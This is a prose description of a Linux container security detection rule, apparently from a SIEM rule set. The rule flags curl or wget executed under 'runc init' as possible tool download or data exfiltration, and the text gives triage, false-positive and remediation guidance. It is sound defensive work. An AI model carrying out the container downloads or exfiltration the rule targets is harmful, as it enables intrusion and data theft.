This rule detects the execution of curl or wget by processes whose proctitle is runc init on Linux hosts instrumented with the Auditd Manager integration. The goal is to identify attempts to fetch tooling or exfiltrate data from within OCI/runc-backed containers, i.e., actions that often follow container breakout or privilege abuse. The match hinges on Linux Auditd events (via process.title = runc init) where the executed binary is curl or wget (process.name) or the command line includes curl/wget paths (process.args). By anchoring to the container runtime boundary, the rule aims to distinguish potentially malicious container-contained downloads from legitimate host activity or image startup. The rule corresponds to MITRE ATT&CK Ingress Tool Transfer (T1105) under the Command and Control tactic, reflecting a risk of downloading external tooling from within a container. It is designed for environments that ship Auditd Manager data and requires syscall audit coverage to capture execve-like events. Triage and analysis guidance focuses on reconstructing full command lines from process.args/process.command_line, identifying URLs or output targets, and mapping events to container metadata (container.id, kubernetes.pod.*) to determine the workload and image involved. Cross-reference host/pod egress shortly after execution and review recent image or manifest changes to rule out expected startup behavior. False positives may arise from legitimate startup scripts, base images, or CI/build pods running curl/wget; exclude known-good images or trusted registries and correlate with pipeline context. Remediation steps include isolating affected nodes/workloads, revoking relevant credentials, inspecting for dropped binaries or persistence mechanisms, and rotating any secrets the container could reach. Setup notes emphasize ensuring execve coverage in Auditd Manager and accurate proctitle mapping for runc init across runtimes, with adjustments for alternatives like crun or containerd runtimes as needed.